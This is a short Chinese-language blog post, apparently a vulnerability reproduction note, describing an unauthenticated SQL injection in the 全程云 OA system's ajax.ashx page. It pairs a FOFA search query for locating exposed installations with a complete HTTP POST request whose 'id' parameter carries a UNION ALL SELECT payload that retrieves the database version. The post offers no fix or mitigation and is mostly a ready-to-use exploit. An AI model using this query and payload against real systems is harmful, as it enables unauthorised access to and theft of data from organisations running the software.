Babing
Published on 2024-08-30 / 2 Visits
0
0

Q8-1全程云-OA-SQL

Q8-1全程云-OA-SQL

漏洞描述:

由于全程云oa办公系统 ajax.ashx页面参数过滤不当,导致存在sql注入漏洞,未授权的攻击者可利用该漏洞获取数据库中的敏感信息。

网站图片:

image-20240625134530944

网络测绘:

fofa语法:

FOFA:body=“images/yipeoplehover.png”

漏洞复现:

payload:

POST /OA/common/mod/ajax.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate

dll=DispartSell_Core.dll&class=DispartSell_Core.BaseData.DrpDataManager&method=GetProductById&id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+

效果图:
查询数据库版本
image-20240619152128899


Comment